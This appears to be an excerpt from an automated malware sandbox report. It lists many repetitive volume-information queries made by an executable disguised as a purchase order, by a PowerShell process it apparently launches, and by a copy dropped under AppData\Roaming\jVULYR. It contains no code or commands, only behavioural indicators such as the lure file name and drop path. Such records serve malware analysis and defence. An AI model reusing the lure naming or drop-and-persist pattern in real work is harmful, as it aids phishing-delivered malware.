Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: unknown VolumeInformation
